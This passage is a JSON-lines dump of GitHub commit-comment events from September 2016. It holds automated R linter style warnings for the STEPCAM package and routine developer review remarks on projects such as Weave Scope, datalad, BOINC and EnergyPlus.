^\n```\n[R/generateArtificialData.R:48:31:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/generateArtificialData.R#L48) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t      l <- (j - 1) * pool_richness + k\n                             ~^~\n```\n[R/generateArtificialData.R:48:36:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/generateArtificialData.R#L48) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t      l <- (j - 1) * pool_richness + k\n                                  ~^\n```\n[R/generateArtificialData.R:49:1:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/generateArtificialData.R#L49) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    traits_distances <- abs(traits_pool - opt_traits_matrix)\n^\n```\n[R/generateArtificialData.R:49:44:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/generateArtificialData.R#L49) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t      opt_traits_matrix[l] <- opt_traits[j]\n                                          ~^~~\n```\n[R/generateArtificialData.R:50:1:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/generateArtificialData.R#L50) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    trait_distances_onedimen <- c()\n^\n```\n[R/generateArtificialData.R:51:1:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/generateArtificialData.R#L51) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    for(m in 1:pool_richness){\n^\n```\n[R/generateArtificialData.R:52:1:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/generateArtificialData.R#L52) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t      trait_distances_onedimen[m] <- sqrt(sum(traits_distances[m, ] * \n^\n```\n[R/generateArtificialData.R:52:31:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/generateArtificialData.R#L52) *style:* **Put spaces around all infix operators.**\n```r\n​\t    opt_traits_matrix <- matrix(opt_traits_matrix, ncol = n_traits)\n                             ~^~~\n```\n[R/generateArtificialData.R:52:65:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/generateArtificialData.R#L52) *style:* **Put spaces around all infix operators.**\n```r\n​\t    opt_traits_matrix <- matrix(opt_traits_matrix, ncol = n_traits)\n                                                               ~^~\n```\n[R/generateArtificialData.R:53:1:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/generateArtificialData.R#L53) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t                                              traits_distances[m, ]))\n^\n```\n[R/generateArtificialData.R:53:30:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/generateArtificialData.R#L53) *style:* **Put spaces around all infix operators.**\n```r\n​\t    traits_distances <- abs(traits_pool - opt_traits_matrix)\n                            ~^~~\n```\n[R/generateArtificialData.R:53:49:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/generateArtificialData.R#L53) *style:* **Put spaces around all infix operators.**\n```r\n​\t    traits_distances <- abs(traits_pool - opt_traits_matrix)\n                                               ~^~\n```\n[R/generateArtificialData.R:54:1:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/generateArtificialData.R#L54) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    }\n^\n```\n[R/generateArtificialData.R:55:1:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/generateArtificialData.R#L55) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    inv_distances <- -(trait_distances_onedimen - \n^\n```\n[R/generateArtificialData.R:55:16:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/generateArtificialData.R#L55) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t    for(m in 1:pool_richness){\n               ^\n```\n[R/generateArtificialData.R:56:1:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/generateArtificialData.R#L56) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t                       max(trait_distances_onedimen)) + 10 ^ -99\n^\n```\n[R/generateArtificialData.R:56:43:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/generateArtificialData.R#L56) *style:* **Put spaces around all infix operators.**\n```r\n​\t      trait_distances_onedimen[m] <- sqrt(sum(traits_distances[m, ] * \n                                         ~^~~\n```\n[R/generateArtificialData.R:56:71:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/generateArtificialData.R#L56) *style:* **Trailing whitespace is superfluous.**\n```r\n​\t      trait_distances_onedimen[m] <- sqrt(sum(traits_distances[m, ] * \n                                                                      ^\n```\n[R/generateArtificialData.R:57:1:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/generateArtificialData.R#L57) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    present_species <- sample(c(1:pool_richness), richness_values[i],\n^\n```\n[R/generateArtificialData.R:59:27:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/generateArtificialData.R#L59) *style:* **Put spaces around all infix operators.**\n```r\n​\t    inv_distances <- -(trait_distances_onedimen - \n                         ~^~~\n```\n[R/generateArtificialData.R:59:31:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/generateArtificialData.R#L59) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t    inv_distances <- -(trait_distances_onedimen - \n                              ^\n```\n[R/generateArtificialData.R:59:51:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/generateArtificialData.R#L59) *style:* **Trailing whitespace is superfluous.**\n```r\n​\t    inv_distances <- -(trait_distances_onedimen - \n                                                  ^\n```\n[R/generateArtificialData.R:60:1:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/generateArtificialData.R#L60) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  comm_spec_matrix[i, c(present_species)] <- 1\n^\n```\n[R/generateArtificialData.R:60:63:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/generateArtificialData.R#L60) *style:* **Put spaces around all infix operators.**\n```r\n​\t                       max(trait_distances_onedimen)) + 10 ^ -99\n                                                              ^~\n```\n[R/generateArtificialData.R:61:1:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/generateArtificialData.R#L61) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t}\n^\n```\n[R/generateArtificialData.R:61:29:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/generateArtificialData.R#L61) *style:* **Put spaces around all infix operators.**\n```r\n​\t    present_species <- sample(c(1:pool_richness), richness_values[i],\n                           ~^~~\n```\n[R/generateArtificialData.R:62:1:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/generateArtificialData.R#L62) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tcomm_spec_matrix\n^\n```\n[R/generateArtificialData.R:63:1:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/generateArtificialData.R#L63) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tif(length(which(colSums(comm_spec_matrix) == 0)) != 0) {\n^\n```\n[R/generateArtificialData.R:64:1:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/generateArtificialData.R#L64) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  traits_pool_df <-\n^\n```\n[R/generateArtificialData.R:66:1:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/generateArtificialData.R#L66) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t}\n^\n```\n[R/generateArtificialData.R:67:1:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/generateArtificialData.R#L67) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\trow1 <- c(column1[-c(which(colSums(comm_spec_matrix) == 0))])\n^\n```\n[R/generateArtificialData.R:67:11:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/generateArtificialData.R#L67) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tif(length(which(colSums(comm_spec_matrix) == 0)) != 0) {\n          ^\n```\n[R/generateArtificialData.R:67:58:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/generateArtificialData.R#L67) *style:* **Put spaces around all infix operators.**\n```r\n​\tif(length(which(colSums(comm_spec_matrix) == 0)) != 0) {\n                                                        ~^~~\n```\n[R/generateArtificialData.R:68:1:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/generateArtificialData.R#L68) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tif(length(which(colSums(comm_spec_matrix) == 0)) != 0) { \n^\n```\n[R/generateArtificialData.R:69:1:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/generateArtificialData.R#L69) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  comm_spec_matrix <-\n^\n```\n[R/generateArtificialData.R:71:1:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/generateArtificialData.R#L71) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t}\n^\n```\n[R/generateArtificialData.R:71:14:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/generateArtificialData.R#L71) *style:* **Put spaces around all infix operators.**\n```r\n​\trow1 <- c(column1[-c(which(colSums(comm_spec_matrix) == 0))])\n            ~^~~\n```\n[R/generateArtificialData.R:71:62:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/generateArtificialData.R#L71) *style:* **Put spaces around all infix operators.**\n```r\n​\trow1 <- c(column1[-c(which(colSums(comm_spec_matrix) == 0))])\n                                                            ~^~~\n```\n[R/generateArtificialData.R:72:11:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/generateArtificialData.R#L72) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tif(length(which(colSums(comm_spec_matrix) == 0)) != 0) { \n          ^\n```\n[R/generateArtificialData.R:72:58:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/generateArtificialData.R#L72) *style:* **Put spaces around all infix operators.**\n```r\n​\tif(length(which(colSums(comm_spec_matrix) == 0)) != 0) { \n                                                        ~^\n```\n[R/generateArtificialData.R:72:58:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/generateArtificialData.R#L72) *style:* **Trailing whitespace is superfluous.**\n```r\n​\tif(length(which(colSums(comm_spec_matrix) == 0)) != 0) { \n                                                         ^\n```\n[R/generateArtificialData.R:73:1:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/generateArtificialData.R#L73) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tcomm_spec_matrix <- as.data.frame(\n^\n```\n[R/generateArtificialData.R:74:1:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/generateArtificialData.R#L74) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t                      cbind(comm_spec_matrix, rep(\"\", n_communities)))\n^\n```\n[R/generateArtificialData.R:75:1:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/generateArtificialData.R#L75) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tnames(comm_spec_matrix) <- row1\n^\n```\n[R/generateArtificialData.R:77:1:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/generateArtificialData.R#L77) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tplots <- as.data.frame(matrix(\n^\n```\n[R/generateArtificialData.R:77:26:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/generateArtificialData.R#L77) *style:* **Put spaces around all infix operators.**\n```r\n​\tcomm_spec_matrix <- as.data.frame(\n                        ~^~~\n```\n[R/generateArtificialData.R:78:1:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/generateArtificialData.R#L78) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t            as.numeric(as.matrix(comm_spec_matrix[,-ncol(comm_spec_matrix)])),\n^\n```\n[R/generateArtificialData.R:79:33:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/generateArtificialData.R#L79) *style:* **Put spaces around all infix operators.**\n```r\n​\tnames(comm_spec_matrix) <- row1\n                               ~^~~\n```\n[R/generateArtificialData.R:81:1:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/generateArtificialData.R#L81) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tnames(plots) <- traits_pool_df[, 1]\n^\n```\n[R/generateArtificialData.R:81:15:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/generateArtificialData.R#L81) *style:* **Put spaces around all infix operators.**\n```r\n​\tplots <- as.data.frame(matrix(\n             ~^~~\n```\n[R/generateArtificialData.R:83:1:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/generateArtificialData.R#L83) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\ttraits_pool_df[ ,c(2:ncol(traits_pool_df))] <- as.matrix(\n^\n```\n[R/generateArtificialData.R:84:1:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/generateArtificialData.R#L84) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t                traits_pool_df[ ,c(2:ncol(traits_pool_df))])\n^\n```\n[R/generateArtificialData.R:85:22:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/generateArtificialData.R#L85) *style:* **Put spaces around all infix operators.**\n```r\n​\tnames(plots) <- traits_pool_df[, 1]\n                    ~^~~\n```\n[R/generateArtificialData.R:86:1:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/generateArtificialData.R#L86) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tfor (i in 2:ncol(traits_pool_df)) {\n^\n```\n[R/generateArtificialData.R:87:53:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/generateArtificialData.R#L87) *style:* **Put spaces around all infix operators.**\n```r\n​\ttraits_pool_df[ ,c(2:ncol(traits_pool_df))] <- as.matrix(\n                                                   ~^~~\n```\n[R/generateArtificialData.R:88:1:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/generateArtificialData.R#L88) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t}\n^\n```\n[R/generateArtificialData.R:89:1:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/generateArtificialData.R#L89) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\toutput <- list( traits = traits_pool_df, abundances = plots);\n^\n```\n[R/generateArtificialData.R:90:13:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/generateArtificialData.R#L90) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tfor (i in 2:ncol(traits_pool_df)) {\n            ^\n```\n[R/generateArtificialData.R:91:1:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/generateArtificialData.R#L91) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\treturn(output)\n^\n```\n"}},"created_at":"2016-09-21T13:11:33Z"}
{"id":"4596139704","type":"CommitCommentEvent","actor":{"login":"brentp"},"repo":{"name":"chapmanb/bioconda-recipes"},"payload":{"comment":{"id":19113425,"position":null,"line":null,"path":null,"commit_id":"fdcc2427a71e9d837eb0e442c2c76db349674a77","created_at":"2016-09-21T13:11:45Z","updated_at":"2016-09-21T13:11:45Z","body":"oh, thanks. I'll get an osx binary up soon."}},"created_at":"2016-09-21T13:11:45Z"}
{"id":"4596141760","type":"CommitCommentEvent","actor":{"login":"krnowak"},"repo":{"name":"kinvolk/scope"},"payload":{"comment":{"id":19113431,"position":101,"line":101,"path":"examples/plugins/http-requests/README.md","commit_id":"57350ff3c5419a0cf2e4b0866f2e9edf5eeec7b8","created_at":"2016-09-21T13:12:08Z","updated_at":"2016-09-21T13:12:08Z","body":"Not sure about the article before the \"data\" word. @iaguis?\r\nAlso, split this into two sentences, just like above.\r\n\"The? data may contain many samples (in the example there is only one sample).\""}},"created_at":"2016-09-21T13:12:08Z"}
{"id":"4596142273","type":"CommitCommentEvent","actor":{"login":"kashike"},"repo":{"name":"DemonWav/MinecraftDev"},"payload":{"comment":{"id":19113432,"position":3,"line":3,"path":"src/main/resources/fileTemplates/j2ee/forge_gradle.properties.ft","commit_id":"54a0a12da105caff16886ae08fb6e2ba1c2b0095","created_at":"2016-09-21T13:12:13Z","updated_at":"2016-09-21T13:12:13Z","body":"This should be outside of the `if`."}},"created_at":"2016-09-21T13:12:13Z"}
{"id":"4596143745","type":"CommitCommentEvent","actor":{"login":"reshmasarath"},"repo":{"name":"reshmasarath/imad-2016-app"},"payload":{"comment":{"id":19113437,"position":null,"line":null,"path":null,"commit_id":"6174d34cab00975e9cf67edc29b7e2c1abeb5b36","created_at":"2016-09-21T13:12:28Z","updated_at":"2016-09-21T13:12:28Z","body":"this is my third article"}},"created_at":"2016-09-21T13:12:28Z"}
{"id":"4596143962","type":"CommitCommentEvent","actor":{"login":"codeskyblue"},"repo":{"name":"BigWavelet/go-minicap"},"payload":{"comment":{"id":19113438,"position":234,"line":234,"path":"minicap.go","commit_id":"f26a250f98e744092e3bfbd4effc78c0511d36df","created_at":"2016-09-21T13:12:31Z","updated_at":"2016-09-21T13:12:31Z","body":"这里最好还是有个超时时间，时间到了还是没有值过来，就返回个error"}},"created_at":"2016-09-21T13:12:31Z"}
{"id":"4596146687","type":"CommitCommentEvent","actor":{"login":"jtrussell"},"repo":{"name":"iVantage/generator-ivh-react-component"},"payload":{"comment":{"id":19113449,"position":31,"line":31,"path":"generators/app/templates/README.md","commit_id":"e367ff2486ef884fb7e6066f084c6b0f8dc21880","created_at":"2016-09-21T13:13:01Z","updated_at":"2016-09-21T13:13:01Z","body":"Makes sense to me - want the commit notch on your belt?"}},"created_at":"2016-09-21T13:13:01Z"}
{"id":"4596146911","type":"CommitCommentEvent","actor":{"login":"lordofhyphens"},"repo":{"name":"alexrj/Slic3r"},"payload":{"comment":{"id":19113450,"position":null,"line":null,"path":null,"commit_id":"b52d569aba7e1a4c6bcb5fefbcae128d755dbadd","created_at":"2016-09-21T13:13:04Z","updated_at":"2016-09-21T13:13:04Z","body":"Slice to SVG, should be in the manual. \r\n\r\nAlso please do not use the comment on commits to ask questions like this."}},"created_at":"2016-09-21T13:13:04Z"}
{"id":"4596148729","type":"CommitCommentEvent","actor":{"login":"alepuccetti"},"repo":{"name":"kinvolk/scope"},"payload":{"comment":{"id":19113456,"position":6,"line":6,"path":"examples/plugins/http-requests/httpd/test.sh","commit_id":"5b1320d799408e5055c0e3baaa2c70396e78d7c4","created_at":"2016-09-21T13:13:23Z","updated_at":"2016-09-21T13:13:23Z","body":"If connections are too short, for some reason that I do not fully understand, the process detail panel does not show up, therefore, the HTTP-request graph is not displayed."}},"created_at":"2016-09-21T13:13:23Z"}
{"id":"4596149242","type":"CommitCommentEvent","actor":{"login":"gearsdigital"},"repo":{"name":"lcdsantos/jQuery-Selectric"},"payload":{"comment":{"id":19113458,"position":null,"line":null,"path":null,"commit_id":"c78b153cb5a46cd633a5060d6a8e91c4f6fde8ac","created_at":"2016-09-21T13:13:29Z","updated_at":"2016-09-21T13:13:29Z","body":"Sounds good to me! \r\n\r\nOkay, give me some time to work this out. I'll provide a PR when I've done the refactoring, okay? "}},"created_at":"2016-09-21T13:13:29Z"}
{"id":"4596150490","type":"CommitCommentEvent","actor":{"login":"nkaraolis"},"repo":{"name":"hmrc/self-service-time-to-pay"},"payload":{"comment":{"id":19113462,"position":51,"line":95,"path":"app/uk/gov/hmrc/ssttp/services/CalculatorService.java","commit_id":"4b4c4449d816833a2bb9f0e52b697324e5aa2be2","created_at":"2016-09-21T13:13:41Z","updated_at":"2016-09-21T13:13:41Z","body":"Fixed :+1: "}},"created_at":"2016-09-21T13:13:41Z"}
{"id":"4596152653","type":"CommitCommentEvent","actor":{"login":"brevilo"},"repo":{"name":"BOINC/boinc"},"payload":{"comment":{"id":19113467,"position":15,"line":800,"path":"lib/str_util.cpp","commit_id":"01ea1ef8fb659c4488425f9bea380009ebe6843f","created_at":"2016-09-21T13:14:04Z","updated_at":"2016-09-21T13:14:04Z","body":">  as basename() potentially changes the array\r\n\r\nThat depends on the `basename()` implementation you use. The GNU version doesn't.\r\n\r\n> which in your example needs to be allocated by the caller\r\n\r\nNo, I just took your example, incl. `new char[]`.\r\n\r\n>  when there is an implementation using only std::string\r\n\r\nI still find it much more complex and thus error prone compared to just:\r\n```\r\nfname.assign(basename(fpath.c_str()));\r\n```"}},"created_at":"2016-09-21T13:14:04Z"}
{"id":"4596154052","type":"CommitCommentEvent","actor":{"login":"codeskyblue"},"repo":{"name":"BigWavelet/go-minicap"},"payload":{"comment":{"id":19113473,"position":273,"line":273,"path":"minicap.go","commit_id":"f26a250f98e744092e3bfbd4effc78c0511d36df","created_at":"2016-09-21T13:14:20Z","updated_at":"2016-09-21T13:14:20Z","body":"这500ms做什么用的？"}},"created_at":"2016-09-21T13:14:20Z"}
{"id":"4596157952","type":"CommitCommentEvent","actor":{"login":"lcdsantos"},"repo":{"name":"lcdsantos/jQuery-Selectric"},"payload":{"comment":{"id":19113479,"position":null,"line":null,"path":null,"commit_id":"c78b153cb5a46cd633a5060d6a8e91c4f6fde8ac","created_at":"2016-09-21T13:15:03Z","updated_at":"2016-09-21T13:15:03Z","body":"Sure!"}},"created_at":"2016-09-21T13:15:03Z"}
{"id":"4596159564","type":"CommitCommentEvent","actor":{"login":"codeskyblue"},"repo":{"name":"BigWavelet/go-minicap"},"payload":{"comment":{"id":19113483,"position":305,"line":305,"path":"minicap.go","commit_id":"f26a250f98e744092e3bfbd4effc78c0511d36df","created_at":"2016-09-21T13:15:20Z","updated_at":"2016-09-21T13:15:20Z","body":"重复代码"}},"created_at":"2016-09-21T13:15:20Z"}
{"id":"4596161738","type":"CommitCommentEvent","actor":{"login":"lgrahl"},"repo":{"name":"saltyrtc/saltyrtc-meta"},"payload":{"comment":{"id":19113490,"position":null,"line":null,"path":null,"commit_id":"18840cd554cd609941a2a0179e409572c87d5df6","created_at":"2016-09-21T13:15:45Z","updated_at":"2016-09-21T13:15:45Z","body":"Alright, changed to\r\n> [...] In order to be able to re-send messages, clients SHALL cache a reasonable amount of client-to-client messages for each other client. [...]\r\n\r\nin 8ece624"}},"created_at":"2016-09-21T13:15:45Z"}
{"id":"4596164279","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19113496,"position":null,"line":null,"path":null,"commit_id":"387b3b84f211e2d32ff5f6b5e205ae2c212f2403","created_at":"2016-09-21T13:16:12Z","updated_at":"2016-09-21T13:16:12Z","body":"Sizing-Simple-Chilled-Ceiling (RKStrand) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (1767 of 1767 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-387b3b84f211e2d32ff5f6b5e205ae2c212f2403-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-387b3b84f211e2d32ff5f6b5e205ae2c212f2403-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-387b3b84f211e2d32ff5f6b5e205ae2c212f2403-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.13%25-green.svg)</a>\n"}},"created_at":"2016-09-21T13:16:12Z"}
{"id":"4596167652","type":"CommitCommentEvent","actor":{"login":"iaguis"},"repo":{"name":"kinvolk/scope"},"payload":{"comment":{"id":19113503,"position":100,"line":100,"path":"examples/plugins/http-requests/README.md","commit_id":"57350ff3c5419a0cf2e4b0866f2e9edf5eeec7b8","created_at":"2016-09-21T13:16:50Z","updated_at":"2016-09-21T13:16:50Z","body":"s/is made/is generated/\r\ns/the process PID/the PID/ (PID = Process Identifier :P)\r\ns/with a `;` as delimiter/with `;` as delimiter/"}},"created_at":"2016-09-21T13:16:50Z"}
{"id":"4596173865","type":"CommitCommentEvent","actor":{"login":"binarywang"},"repo":{"name":"wechat-group/weixin-java-tools"},"payload":{"comment":{"id":19113518,"position":null,"line":null,"path":null,"commit_id":"7e21f4692b37783b883e372eaeb25298c1e82767","created_at":"2016-09-21T13:17:54Z","updated_at":"2016-09-21T13:17:54Z","body":"finish #31 "}},"created_at":"2016-09-21T13:17:54Z"}
{"id":"4596174926","type":"CommitCommentEvent","actor":{"login":"binarywang"},"repo":{"name":"wechat-group/weixin-java-tools"},"payload":{"comment":{"id":19113519,"position":null,"line":null,"path":null,"commit_id":"6e32028c501ad195d52ec2b5f5368f985d4d89e6","created_at":"2016-09-21T13:18:07Z","updated_at":"2016-09-21T13:18:07Z","body":"finish #31 "}},"created_at":"2016-09-21T13:18:07Z"}
{"id":"4596176189","type":"CommitCommentEvent","actor":{"login":"binarywang"},"repo":{"name":"wechat-group/weixin-java-tools"},"payload":{"comment":{"id":19113522,"position":null,"line":null,"path":null,"commit_id":"9780d651d6a3ec050e84097d259794e5f0af3999","created_at":"2016-09-21T13:18:21Z","updated_at":"2016-09-21T13:18:21Z","body":"finish #31 "}},"created_at":"2016-09-21T13:18:21Z"}
{"id":"4596177132","type":"CommitCommentEvent","actor":{"login":"yarikoptic"},"repo":{"name":"bpoldrack/datalad"},"payload":{"comment":{"id":19113527,"position":8,"line":596,"path":"datalad/distribution/install.py","commit_id":"5f5de3673af696670ca6f806626ea31913ab2d02","created_at":"2016-09-21T13:18:31Z","updated_at":"2016-09-21T13:18:31Z","body":"shouldn't `recursion_limit=None if recursion_limit is None else max(recursion_limit - 1, 0)` (borrowed from save, so we need a little helper to reuse): \r\n```python\r\ndef decrement_count(x):\r\n    return x if not x else max(x-1, 0)\r\n```\r\nor smth like that"}},"created_at":"2016-09-21T13:18:31Z"}
{"id":"4596177406","type":"CommitCommentEvent","actor":{"login":"binarywang"},"repo":{"name":"wechat-group/weixin-java-tools"},"payload":{"comment":{"id":19113528,"position":null,"line":null,"path":null,"commit_id":"c5c86286688a1173e772d533b74b71965fd462d1","created_at":"2016-09-21T13:18:34Z","updated_at":"2016-09-21T13:18:34Z","body":"finish #31 "}},"created_at":"2016-09-21T13:18:34Z"}
{"id":"4596178317","type":"CommitCommentEvent","actor":{"login":"iaguis"},"repo":{"name":"kinvolk/scope"},"payload":{"comment":{"id":19113530,"position":101,"line":101,"path":"examples/plugins/http-requests/README.md","commit_id":"57350ff3c5419a0cf2e4b0866f2e9edf5eeec7b8","created_at":"2016-09-21T13:18:44Z","updated_at":"2016-09-21T13:18:44Z","body":"Each element contains the metrics data provided by the HTTP requests plugin (just one metric in the example). The data may contain many samples (just one in the example)."}},"created_at":"2016-09-21T13:18:44Z"}
{"id":"4596179002","type":"CommitCommentEvent","actor":{"login":"binarywang"},"repo":{"name":"wechat-group/weixin-java-tools"},"payload":{"comment":{"id":19113532,"position":null,"line":null,"path":null,"commit_id":"f13dcaa1fc09199925ecf7d3581cf1a19fe3a921","created_at":"2016-09-21T13:18:51Z","updated_at":"2016-09-21T13:18:51Z","body":"finish #31 "}},"created_at":"2016-09-21T13:18:51Z"}
